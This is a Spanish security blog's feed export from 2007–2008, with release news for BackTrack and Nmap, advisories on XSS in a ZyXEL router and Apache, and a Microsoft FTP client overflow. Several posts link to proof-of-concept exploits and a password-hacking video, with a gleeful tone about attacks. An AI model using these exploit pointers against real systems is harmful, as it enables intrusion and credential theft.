contraseña jajajaja (risa malefica) quieres saber ehhhh pulsa &lt;a href="http://www.metacafe.com/watch/871129/hacking_windows_passwords/#"&gt;AQUI&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-7895180192277842854?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='enclosure' type='video/mp4' href='http://www.blogger.com/video-play.mp4?contentId=53b8636c63e3199&amp;type=video%2Fmp4' length='0'/><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/7895180192277842854/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=7895180192277842854' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7895180192277842854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7895180192277842854'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/es-tu-contrasea-lo-sificientemente.html' title='Es tu contraseña lo suficientemente robusta? ;)'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2814075338826852713</id><published>2008-01-02T15:35:00.000+01:00</published><updated>2008-01-02T15:52:56.668+01:00</updated><title type='text'>Humor....de informatico</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R3ulJiVYj0I/AAAAAAAAAFA/qFGnJG0ilME/s1600-h/conducta_responsable.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R3ulJiVYj0I/AAAAAAAAAFA/qFGnJG0ilME/s400/conducta_responsable.jpg" alt="" id="BLOGGER_PHOTO_ID_5150892182082195266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;img src="file:///C:/DOCUME%7E1/dmartin6/CONFIG%7E1/Temp/moz-screenshot.jpg" alt="" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2814075338826852713?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2814075338826852713/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2814075338826852713' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2814075338826852713'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2814075338826852713'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/humorde-informatico.html' title='Humor....de informatico'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R3ulJiVYj0I/AAAAAAAAAFA/qFGnJG0ilME/s72-c/conducta_responsable.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1647459893494244811</id><published>2008-01-02T11:30:00.000+01:00</published><updated>2008-01-02T11:45:32.371+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Liberada la versión 3.0 Beta del live cd BackTrack</title><content type='html'>La gente de BackTrack ha liberado una nueva versión de la famosa herramienta para los pen-testers.&lt;br /&gt;&lt;br /&gt;Destacar que la nueva versión añade la siguientes características a las ya conocidas:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Posibilidad de instalar BackTrack en un USB con una imagen de 700 Mb.&lt;/li&gt;&lt;li&gt;Soporte para los microprocesadores DUAL CORE.&lt;/li&gt;&lt;li&gt;Más modelos de tarjetas &lt;span style="font-style: italic;"&gt;WIFI &lt;/span&gt;soportados.&lt;/li&gt;&lt;li&gt;Configuración de XORG ha sido mejorada&lt;/li&gt;&lt;li&gt;Actualizados los repositorios de los Exploits y Metasploit Framework&lt;/li&gt;&lt;li&gt;Arranque PXE añadida a la versión USB&lt;/li&gt;&lt;li&gt;Añadida a la version USB  PwnSauce Instant John the Ripper.&lt;/li&gt;&lt;/ul&gt;Change log &lt;a href="http://wiki.remote-exploit.org/index.php/Main_Page"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Os ha gustado ehhhhh entonces... descárgalo &lt;a href="http://www.remote-exploit.org/backtrack_download.html"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1647459893494244811?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1647459893494244811/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1647459893494244811' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1647459893494244811'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1647459893494244811'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/liberada-la-versin-30-beta-del-live-cd.html' title='Liberada la versión 3.0 Beta del live cd BackTrack'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5812542508721940624</id><published>2008-01-02T11:15:00.000+01:00</published><updated>2008-01-02T11:26:40.733+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Cross-site scripting en el interfaz web de ZyXEL P-330W Wireless Router</title><content type='html'>&lt;div style="text-align: left;"&gt;Buenas a todos....&lt;br /&gt;&lt;br /&gt;Aunque sea una vulnerabilidad de año pasado :P cuantos de vosotros teneis el router ZyXEL P-330W? Gracias a nuestros queridísimos ISP alabados sean! tenemos routers con vulnerabilidades...&lt;br /&gt;&lt;br /&gt;En concreto el modelo P-330W de ZyXEL en su interfaz web de administración "sufre" cross-site scripting (XSS).&lt;br /&gt;&lt;/div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R3tmoiVYjyI/AAAAAAAAAEw/jjSugx3JYJ4/s1600-h/zyxel.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 138px;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R3tmoiVYjyI/AAAAAAAAAEw/jjSugx3JYJ4/s200/zyxel.jpg" alt="" id="BLOGGER_PHOTO_ID_5150823445425590050" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;La vulnerabilidad está causada porque la interfaz no filtra de forma&lt;br /&gt;adecuada el código HTML de entrada, introducido por el usuario, antes de&lt;br /&gt;que éste sea mostrado. Esto podría ser explotado por un atacante remoto,&lt;br /&gt;por medio de una URL especialmente modificada, para ejecutar código&lt;br /&gt;JavaScript o HTML arbitrario. El código se originaría desde la interfaz&lt;br /&gt;web del router y sería ejecutado en el contexto de seguridad del usuario&lt;br /&gt;que visita dicha URL.&lt;br /&gt;&lt;br /&gt;El atacante podría tener así acceso las cookies de usuario, incluidas&lt;br /&gt;las de autenticación, o a cualquier otra información que haya sido&lt;br /&gt;enviada recientemente al router a través de formularios web. Además&lt;br /&gt;podría realizar acciones en dicha web con los credenciales del usuario,&lt;br /&gt;pudiendo así cambiar la configuración del router.&lt;br /&gt;&lt;br /&gt;Recientemente se ha publicado un exploit en el que se muestra como&lt;br /&gt;cambiar la contraseña de administrador del router. La vulnerabilidad&lt;br /&gt;&lt;script&gt;&lt;!-- D(["mb","está confirmada para la versión ZyXEL P-330W Wireless Router aunque\u003cbr /\&gt;podría afectar a otras versiones. Por el momento existe ningún parche\u003cbr /\&gt;disponible proporcionado por el fabricante.\u003cbr /\&gt;\u003cbr /\&gt;Opina sobre esta noticia:\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/3350/comentar\" target\u003d_blank\&gt;http://www.hispasec.com\u003cwbr /\&gt;/unaaldia/3350/comentar\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;Más información:\u003cbr /\&gt;\u003cbr /\&gt;[Full-disclosure] Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF\u003cbr /\&gt;\u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://seclists.org/fulldisclosure/2007/Dec/0559.html\" target\u003d_blank\&gt;http://seclists.org/fulldisclo\u003cwbr /\&gt;sure/2007/Dec/0559.html\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt;Pablo Molina\u003cbr /\&gt;pmolina @ \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://hispasec.com\" target\u003d_blank\&gt;hispasec.com\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;\u003cbr /\&gt; Tal día como hoy:\u003cbr /\&gt; -----------------\u003cbr /\&gt;\u003cbr /\&gt;26/12/2006: El caso del malware que se propaga por Skype\u003cbr /\&gt;    \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/2985\" target\u003d_blank\&gt;http://www.hispasec.com\u003cwbr /\&gt;/unaaldia/2985\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;26/12/2005: Escalada de privilegios en Sun Solaris PC NetLink\u003cbr /\&gt;    \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/2620\" target\u003d_blank\&gt;http://www.hispasec.com\u003cwbr /\&gt;/unaaldia/2620\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;26/12/2004: Vulnerabilidad de formateo de nombre en SHOUTcast\u003cbr /\&gt;    \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/2255\" target\u003d_blank\&gt;http://www.hispasec.com\u003cwbr /\&gt;/unaaldia/2255\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;26/12/2003: Actualización general de seguridad para Mac OS X\u003cbr /\&gt;    \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/1888\" target\u003d_blank\&gt;http://www.hispasec.com\u003cwbr /\&gt;/unaaldia/1888\u003c/a\&gt;\u003cbr /\&gt;\u003cbr /\&gt;26/12/2002: Bautizar un virus\u003cbr /\&gt;    \u003ca onclick\u003d\"return top.js.OpenExtLink(window,event,this)\" href\u003d\"http://www.hispasec.com/unaaldia/1523\" target\u003d_blank\&gt;",1] );  //--&gt;&lt;/script&gt;está confirmada para la versión ZyXEL P-330W Wireless Router aunque&lt;br /&gt;podría afectar a otras versiones. Por el momento existe ningún parche&lt;br /&gt;disponible proporcionado por el fabricante.&lt;br /&gt;&lt;br /&gt;Información sacada de....&lt;a href="http://www.hispasec.com/"&gt;Hispasec&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5812542508721940624?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5812542508721940624/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5812542508721940624' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5812542508721940624'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5812542508721940624'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/cross-site-scripting-en-el-interfaz-web.html' title='Cross-site scripting en el interfaz web de ZyXEL P-330W Wireless Router'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R3tmoiVYjyI/AAAAAAAAAEw/jjSugx3JYJ4/s72-c/zyxel.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5976575340521178058</id><published>2008-01-02T11:06:00.000+01:00</published><updated>2008-01-02T11:14:17.363+01:00</updated><title type='text'>Feliz año nuevo!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/R3tj0CVYjxI/AAAAAAAAAEo/7k--fMjOzbI/s1600-h/feliz+08.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/R3tj0CVYjxI/AAAAAAAAAEo/7k--fMjOzbI/s400/feliz+08.jpg" alt="" id="BLOGGER_PHOTO_ID_5150820344459202322" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5976575340521178058?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5976575340521178058/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5976575340521178058' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5976575340521178058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5976575340521178058'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2008/01/feliz-ao-nuevo.html' title='Feliz año nuevo!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/R3tj0CVYjxI/AAAAAAAAAEo/7k--fMjOzbI/s72-c/feliz+08.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4214135888432853223</id><published>2007-12-18T11:41:00.000+01:00</published><updated>2007-12-18T12:17:11.465+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Nmap'/><title type='text'>Nmap 4.50 (10th Anniversary Edition) released!!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R2en-yVYjoI/AAAAAAAAADM/vtgPTmr6Sew/s1600-h/nmap_bnr_scottm_728_90.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R2en-yVYjoI/AAAAAAAAADM/vtgPTmr6Sew/s400/nmap_bnr_scottm_728_90.jpg" alt="" id="BLOGGER_PHOTO_ID_5145265796399271554" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Me congratula comunicaros que Fyodor ha liberado una nueva versión para NMAP en concreto la versión 4.50...con el pretexto de que la herramienta ha cumplido 10 años... ahí es nada....&lt;br /&gt;&lt;br /&gt;En esta nueva versión se han incluido nuevas funcionalidades...pulsa &lt;a href="http://insecure.org/nmap/changelog.html"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y para los que utilizan NMAP por primera vez &lt;a href="http://insecure.org/nmap/download.html"&gt;entorno gráfico....&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yo que tú me la &lt;a href="http://insecure.org/nmap/download.html"&gt;descargaba&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/R2esEyVYjqI/AAAAAAAAADc/Of5-SUIa6e0/s1600-h/nmap_bnr_matrix_pfos.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/R2esEyVYjqI/AAAAAAAAADc/Of5-SUIa6e0/s400/nmap_bnr_matrix_pfos.gif" alt="" id="BLOGGER_PHOTO_ID_5145270297524997794" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4214135888432853223?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4214135888432853223/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4214135888432853223' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4214135888432853223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4214135888432853223'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/12/nmap-450-10th-anniversary-edition.html' title='Nmap 4.50 (10th Anniversary Edition) released!!'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp0.blogger.com/_x7dE_ssr2K8/R2en-yVYjoI/AAAAAAAAADM/vtgPTmr6Sew/s72-c/nmap_bnr_scottm_728_90.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2243885276744666412</id><published>2007-12-18T11:27:00.000+01:00</published><updated>2007-12-18T11:41:26.581+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Vulnerabilidad en Apache 1.3.x y 2.2.x : XSS</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R2eg3iVYjjI/AAAAAAAAACk/G_KOq-sh3TA/s1600-h/apache1.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R2eg3iVYjjI/AAAAAAAAACk/G_KOq-sh3TA/s200/apache1.gif" alt="" id="BLOGGER_PHOTO_ID_5145257975263825458" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Buenas.........&lt;br /&gt;&lt;br /&gt;Otra vulnerabilidad descubierta en este caso le cae al servidor Web Apache...&lt;br /&gt;&lt;br /&gt;La vulnerabilidad que afecta a las versiones 1.3.x está localizada en el mod_imap y está causada porque algunas entradas no se eliminan antes de ser vueltas a los usuarios.Esto...podría ser utilizado por un atacante remoto para inyectar código ejecutable (JavaScript p.ejem). Para que la vulnerabilidad pueda ser explotada se requiere que mod_imap esté activado y sus ficheros&lt;br /&gt;accesibles de forma pública.&lt;br /&gt;&lt;br /&gt;La vulnerabilidad que afecta a las versiones 2.2.x está localizada en la función mod_imagemap y al igual que la anterior, permite inyectar código ejecutable porque las entradas no se eliminan correctamente.Para que la vulnerabilidad pueda ser explotada se requiere que mod_imagemap esté activado y sus ficheros accesibles de forma pública.&lt;br /&gt;&lt;br /&gt;Más información:&lt;br /&gt;&lt;br /&gt;Para las versiones &lt;a href="http://httpd.apache.org/security/vulnerabilities_13.html"&gt;1.3.x &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Para las versiones &lt;a href="http://httpd.apache.org/security/vulnerabilities_22.html"&gt;2.2.x&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Información obtenida de &lt;a href="http://www.hispasec.com/"&gt;Hispasec&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2243885276744666412?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2243885276744666412/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2243885276744666412' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2243885276744666412'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2243885276744666412'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/12/vulnerabilidad-en-apache-13x-y-22x-xss.html' title='Vulnerabilidad en Apache 1.3.x y 2.2.x : XSS'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp3.blogger.com/_x7dE_ssr2K8/R2eg3iVYjjI/AAAAAAAAACk/G_KOq-sh3TA/s72-c/apache1.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-8984566056334599467</id><published>2007-12-05T11:06:00.000+01:00</published><updated>2007-12-10T17:56:27.927+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BugTrack'/><title type='text'>Vulnerabilidad Microsoft FTP Client</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/R1aAGNVODZI/AAAAAAAAACM/kaWp_16V-yU/s1600-h/piratas.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/R1aAGNVODZI/AAAAAAAAACM/kaWp_16V-yU/s200/piratas.png" alt="" id="BLOGGER_PHOTO_ID_5140436868836232594" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Una vulnerabilidad más pal saco.....&lt;br /&gt;&lt;br /&gt;Vulnerabilidad descubierta el 20 de Noviembre y comunicada al fabricante el 28 de Noviembre.&lt;br /&gt;&lt;br /&gt;Resumen: La vulnerabilidad descubierta en el cliente FTP de Microsoft, produce como resultado un BufferOverflow en la máquina víctima.&lt;br /&gt;&lt;br /&gt;Aplicaciones afectadas: Microsoft FTP Client&lt;br /&gt;&lt;br /&gt;Plataformas afectadas: W2K Server, W2K Professional, Wxp, otras versiones pueden verse afectadas.&lt;br /&gt;&lt;br /&gt;Descubridor: Rajesh Sethumadhavan&lt;br /&gt;&lt;br /&gt;Descripción: Un usuario malintencionado (ñam ñam...jajajaja) puede crear un paquete con un payload determinado el cual se ejecute cuando un usuario ejecuta comandos FTP tales como: "mget" , "ls", "dir", "username" y "password", y el resultado es un BufferOverflow en la máquina cliente.&lt;br /&gt;&lt;br /&gt;Impacto: La vulnerabilidad puede permitir la ejecución de código arbitrario con los privilegios del usuario logeado.&lt;br /&gt;&lt;br /&gt;Proof of concept: "&lt;a href="http://www.xdisclose.com/poc/mget.bat.txt"&gt;mget&lt;/a&gt;" "&lt;a href="http://www.xdisclose.com/poc/list.bat.txt"&gt;list&lt;/a&gt;"&lt;br /&gt;&lt;br /&gt;Solución: No existe solución.....no se ha publicado parche.&lt;br /&gt;&lt;br /&gt;Aquí tenéis pantallazos de los resultados de la vulnerabilidad.... (especial dedicación...rocherna&amp;amp;company)&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_x7dE_ssr2K8/R11vEtVODbI/AAAAAAAAACc/WKKs5TnO9dY/s1600-h/msftpbof.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp3.blogger.com/_x7dE_ssr2K8/R11vEtVODbI/AAAAAAAAACc/WKKs5TnO9dY/s200/msftpbof.jpg" alt="" id="BLOGGER_PHOTO_ID_5142388476205731250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.xdisclose.com/advisory/XD100096.html"&gt;Link &lt;/a&gt;donde se explica la vulnerabilidad&lt;br /&gt;&lt;br /&gt;Empezarán a crecer como setas los servidores FTP en internet....??? jajajajajaja (risa malefica)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-8984566056334599467?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/8984566056334599467/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=8984566056334599467' title='2 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8984566056334599467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/8984566056334599467'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/12/vulnerabilidad-microsoft-ftp-client.html' title='Vulnerabilidad Microsoft FTP Client'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/R1aAGNVODZI/AAAAAAAAACM/kaWp_16V-yU/s72-c/piratas.png' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5301750073225079328</id><published>2007-12-04T10:15:00.000+01:00</published><updated>2007-12-04T10:27:44.874+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Tools</title><content type='html'>Buenas a todos&lt;br /&gt;&lt;br /&gt;Una nueva de ristra de herramientas para descargar....&lt;br /&gt;&lt;br /&gt;De la gente de S21 &lt;a href="http://www.yersinia.net/"&gt;Yersinia&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;De la gente de Isecom &lt;a href="http://www.isecom.org/scare"&gt;Scare&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;No les conozco pero presumen de que su herramienta ocupa el segundo lugar en el ranking de &lt;a href="http://www.tropheesdulibre.org/Unicornscan,313.html?lang=en"&gt;Les Trophées du Libre 2007&lt;/a&gt;. &lt;a href="http://www.unicornscan.org/"&gt;Unicorn&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Auditando IDS??? &lt;a href="http://wwwcsif.cs.ucdavis.edu/%7Ewongfs/research.html"&gt;Tcpopera&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Ala chicha teneis.... y comentarios????&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5301750073225079328?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5301750073225079328/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5301750073225079328' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5301750073225079328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5301750073225079328'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/12/tools.html' title='Tools'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 